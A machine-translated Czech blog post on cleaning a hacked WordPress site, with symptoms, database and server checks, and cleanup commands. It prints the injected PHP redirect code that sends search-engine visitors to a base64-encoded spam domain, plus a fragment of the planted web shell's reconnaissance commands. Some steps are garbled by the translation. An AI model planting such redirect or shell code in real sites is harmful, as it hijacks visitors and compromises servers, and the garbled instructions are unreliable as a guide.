Virová blogosféra ... ale co jsi měl se mnou?

Update
0

V posledním měsíci, jsem obdržel varování virus v blogu z některých návštěvníků. Původně jsem ignoroval varování, protože jsem nainstaloval docela dobrý antivirový program (Kaspersky AV 2009) A i blog na dlouhou dobu, nikdy jsem dostal virus alert (dávno .. Viděl jsem něco podezřelého, že první obnovovací zmizel. Konečně ...).
Pomalu začaly projevovat velké rozdíly návštěvnostiPo která nedávno plynule snížila návštěvnost a začal být stále více a více lidí mi říct, že stealthsettings.com to je Virus. Včera jsem dostal od někoho screenshot udělat, když antivirus zablokování skript z stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Bylo to dost přesvědčivé na mě, tak jsem dal všechny zdroje prohledávány. První myšlenka, která mě napadla, byla k tomu upgradovat poslední WordPress (2.5.1), ale ne dříve, než smažete všechny soubory ve starém skriptu WordPress a vyrobit zálohování databáze. Tento postup nefungoval a pravděpodobně mi trvalo dlouho, než jsem zjistil, kde se chyba nachází, pokud mi to neřeklo. Eugen v diskusi nad kávou, našel odkaz Google a že by bylo dobré ho vidět.
MyDigitalLife.info, publikoval článek s názvem: „WordPress Hack: Obnovte a opravte Google a vyhledávač nebo žádný provoz z cookies přesměrován na Your-Needs.info, AnyResults.Net, Golden-Info.net a další nelegální stránky"To je konec nitě jsem potřeboval.
Je to o využít de WordPress založené na cookiesCož myslím, že je velmi složité a udělal knihu. Natolik chytrý, aby se SQL Injection Databáze blog, vytvořit neviditelný uživatele jednoduché rutinní kontrola Hlavní obrazovka->uživatelé, Zkontrolujte server adresáře a soubory "nahrávací" (že chmod 777), vyhledávat a do vykonat Soubory s oprávněními skupiny nebo kořen. Já nevím, kdo zneužít jméno a vidět, že existuje jen málo napsané články o něm, a to navzdory skutečnosti, že mnoho blogů jsou infikovány, včetně Rumunska. Ok ... Budu se snažit, aby se pokusili vysvětlit všeobecnosti o viru.

Co je to virus?

Nejprve vložte zdroje stránky na blogy, odkazy neviditelné pro návštěvníky, ale viditelný a destičkové pro vyhledávače, zejména Google. Takto převod stránky Page Rank uvedené útočníkem. Za druhé je vložen další Přesměrování kód URL pro návštěvníky z Google, Live, Yahoo, ... nebo RSS čtečka a ne místo v sušenka, antivirus detekuje přesměrování as Trojan-Clicker.HTML.

Příznaky:

Snížená masivní návštěvnostiZejména na blogy, kde většina návštěvníků přichází z Google.

Identifikace: (zde se problém komplikuje pro ty, kteří toho o phpmyadmin, php a linux)

LA. VAROVÁNÍ! Nejprve vytvořit záložní databázi!

1. Zkontrolujte zdrojové soubory index.php, header.php, footer.php, Téma tohoto blogu a uvidíme, jestli tam je kód, který používá šifrování base64 nebo obsahuje „if ($ ser ==“ 1? && sizeof ($ _ COOKIE) == 0) ”ve tvaru:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... Nebo tak něco. Smazat tento kód!

Klikněte na obrázek ...

Kód index

Na snímku obrazovky výše jsem omylem vybral a „ ". Ten kód musí zůstat.

2. Použití phpMyAdmin a jít do databázové tabulky wp_usersTam, kde kontrola není-li uživatelské jméno vytvořené na 00:00:00 0000-00-00 (Možná v oblasti user_login psát "WordPress“. Zapište si ID tohoto uživatele (pole ID) a poté jej odstraňte.

Klikněte na obrázek ...

Fake uživatele

* Zelená linka by měla být odstraněna, a udržel si ID. V případě ospalýByl ID = 8 .

3. Přejít na tabulky wp_usermeta, Kde se nachází a vymazat linky pro ID (pokud pole user_id ID hodnota je odstraněn).

4. V tabulce wp_option, Jdi na active_plugins a uvidíte, co plugin je povoleno podezřelého. To může být použit jako zakončení _old.giff, _old.pngg, _old.jpeg, _new.php.giffatd. kombinace rozšířených rozšíření o obrázek s _old a _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Smažte tento plugin a přejděte do blogu -> Dashboard -> Pluginy, kde deaktivujete a aktivujete libovolný plugin.

Klikněte na obrázek pro zobrazení je zdá active_plugins virus soubor.

plugin

Sledujte cestu na FTP nebo SSH, je uvedeno v active_plugins a smazat soubor ze serveru.

5. Také v phpMyAdmin, v tabulce wp_option, Najít a odstranit řádek obsahující "rss_f541b3abd05e7962fcab37737f40fad8"A"internal_links_cache ".
V internal_links_cache, nabídl šifrované spamu odkazy, které se zobrazují v blogu kód Google Adsšíje, Hacker.

6. Doporučuje se, aby změnit heslo Blog a přihlášení odebrat všechny podezřelé userele. Upgradujte na nejnovější verzi WordPress a nastavte blog tak, aby již neumožňoval registraci nových uživatelů. Neexistuje žádná ztráta… může také komentovat neobydlený.

Pokusil jsem se výše vysvětlit trochu, co dělat v takové situaci, vyčistit blog od tohoto viru. Problém je mnohem vážnější, než se zdá, a ani zdaleka není vyřešen, protože jsou využívány bezpečnostní zranitelnosti hosting webový server, který je blog.

Jako první opatření bezpečnosti, s přístupem SSH, Udělat nějaké kontroly na serveru, zda jsou soubory jako * _old * a * _New. * S koncovkami.Giff,. jpeg,. pngg,. jpgg. Tyto soubory musí být odstraněny. Pokud přejmenujete soubor, například. top_right_old.giff in top_right_old.phpVidíme, že soubor je přesně kód zneužití serveru.

Několik užitečných pokynů pro kontrolu, čištění a zabezpečení serveru. (přes SSH)

1.  cd / tmp a zkontrolujte, zda jsou k dispozici adresáře jako tmpVFlma nebo jiný kombinace asemenatoare jméno a odstranit ji. Viz obrázek níže, dvě takové složky, které se mi:

tmpserver

rm-rf foldername

2. Zkontrolujte a odstraňte (změňte chmod-ul) pokud možno složky s atributy chmod 777

najít všechny zapisovatelné soubory v aktuálním adresáři: Najít. -Type f-perm-2-ls
najít všechny zapisovatelné adresáře v aktuální dir: Najít. -Type d-perm-2-ls
najít všechny zapisovatelné adresáře a soubory v aktuálním adresáři: Najít. -Perm-2-ls

3. Hledáte podezřelých souborů na serveru.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, POZOR !!! soubory, které si stanovili trochu SUID si SGID. Tyto soubory spustit s právy uživatele (skupina), nebo kořen, ne uživatel, který spustit soubor. Tyto soubory mohou vést k kořenové kompromisu, pokud se jeho bezpečnostní problémy. Pokud nechcete používat suid a SGID soubory s trochou, proveďte "chmod 0 " je, nebo odinstalovat balíček obsahující jim.

Exploit obsahuje někde ve zdroji ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Zjistí, že způsob, jak ... v podstatě narušení bezpečnosti. Přístavy otevřete adresář "zápis" a skupinové spuštění výsady souborů / kořen.

Zpět s více ...

Některé infikované blogy: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motocykly.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/inut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... A seznam pokračuje ... hodně.

Pomocí vyhledávače Google můžete zkontrolovat, zda je blog infikován. kopírovat vložit:

Místo: www.blegoo.com koupit

Dobrou noc a dobrou práci;) Brzy si myslím, že Eugen přijde se zprávami, na prevezibil.imprevizibil.com

BRB :)

POZORNOST! Změna tématu WordPress nebo upgradovat na WordPress 2.5.1 NENÍ řešením, jak se tohoto viru zbavit.

Věnovaný technologiím, s radostí píši na StealthSettings.com od roku 2006. Mám bohaté zkušenosti s operačními systémy: macOS, Windows a Linux, stejně jako s programovacími jazyky a platformami pro blogování (WordPress) a pro online obchody (WooCommerce, Magento, PrestaShop).

Návody napsané mnou.
AntiVirus a zabezpečení Internet Net Surfing Pozoruhodný Tech News Návody a IT novinky Vylepšení a hacky WordPress
iframe virus Page Rank využít Server Security virus spam SQL Injection trojan clicker virus wordpress WordPress Využívat
jak na to » Pozoruhodný » Virová blogosféra ... ale co jsi měl se mnou?

Windows Živý spisovatel / WordPress - Neplatná odezva serveru (XMLRPC)

Jak zjistit pomocí Googlu, zda je blog WordPress je to virus

Zanechat komentář

Stealth Settings

Windows

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows průhled

Windows XP

Správce úloh

Jak

Microsoft 365 / Office

Microsoft 365 / Office

vynikat

Word

PowerPoint

Outlook

Office 365 Productivity

Linux & Web Software

Nginx

Apache HTTP Server

PHP

SQL/MySQL

CentOS

ubuntu

Webhosting

WordPress & WooCommerce

Security & Antivirus

Awareness

Antivirus & Security

Malware

Spyware

© 2024 Stealth Settings. IT návody a novinky.

Politika důvěrnosti | O souborech cookie | Kontakt | O nás